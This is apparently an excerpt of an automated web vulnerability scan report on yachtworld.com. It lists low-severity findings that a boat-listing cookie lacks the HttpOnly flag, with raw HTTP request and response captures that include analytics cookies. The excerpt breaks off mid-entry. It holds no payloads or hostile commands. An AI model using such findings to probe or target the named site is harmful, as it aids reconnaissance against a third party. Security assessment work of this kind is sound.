Set-Cookie: VIEWED_BOATS_STORE=2291213%5B%25%5D32%27+Regulator+32+Forward+Seating+*Low+Hours*%5B%25%5DUSD%26nbsp%3B114%2C995%5B%25%5DNorwalk%2C+CT%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F1%2F2%2F2291213_1_mini.jpg%3F1291236529000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-*Low-Hours*-2291213%2FNorwalk%2FCT%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...

9.59. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:20:10 GMT
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; s_pers=%20s_nr%3D1296156027245%7C1298748027245%3B%20s_lv%3D1296156027247%7C1390764027247%3B%20s_lv_s%3DFirst%2520Visit%7C1296157827247%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.8.10.1296155952

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:20:10 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 07 Dec 2010 19:37:18 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:20:10 GMT
Set-Cookie: VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 27594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...

9.60. http://www.yachtworld.com/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIEWED_BOATS_STORE=2267348%5B%25%5D32%27+Regulator+32FS+with+Trailer%5B%25%5DUSD%26nbsp%3B139%2C900%5B%25%5DQuincy%2C+MA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F7%2F3%2F2267348_1_mini.jpg%3F1285440379000%5B%25%5D%2Fboats%2F2006%2FRegulator-32FS-with-Trailer-2267348%2FQuincy%2FMA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:58:48 GMT
VIEWED_BOATS_STORE=2267348%5B%25%5D32%27+Regulator+32FS+with+Trailer%5B%25%5DUSD%26nbsp%3B139%2C900%5B%25%5DQuincy%2C+MA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F7%2F3%2F2267348_1_mini.jpg%3F1285440379000%5B%25%5D%2Fboats%2F2006%2FRegulator-32FS-with-Trailer-2267348%2FQuincy%2FMA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:48 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 14 Jan 2011 16:46:52 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2267348%5B%25%5D32%27+Regulator+32FS+with+Trailer%5B%25%5DUSD%26nbsp%3B139%2C900%5B%25%5DQuincy%2C+MA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F7%2F3%2F2267348_1_mini.jpg%3F1285440379000%5B%25%5D%2Fboats%2F2006%2FRegulator-32FS-with-Trailer-2267348%2FQuincy%2FMA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:58:48 GMT
Set-Cookie: VIEWED_BOATS_STORE=2267348%5B%25%5D32%27+Regulator+32FS+with+Trailer%5B%25%5DUSD%26nbsp%3B139%2C900%5B%25%5DQuincy%2C+MA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F7%2F3%2F2267348_1_mini.jpg%3F1285440379000%5B%25%5D%2Fboats%2F2006%2FRegulator-32FS-with-Trailer-2267348%2FQuincy%2FMA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...

9.61. http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

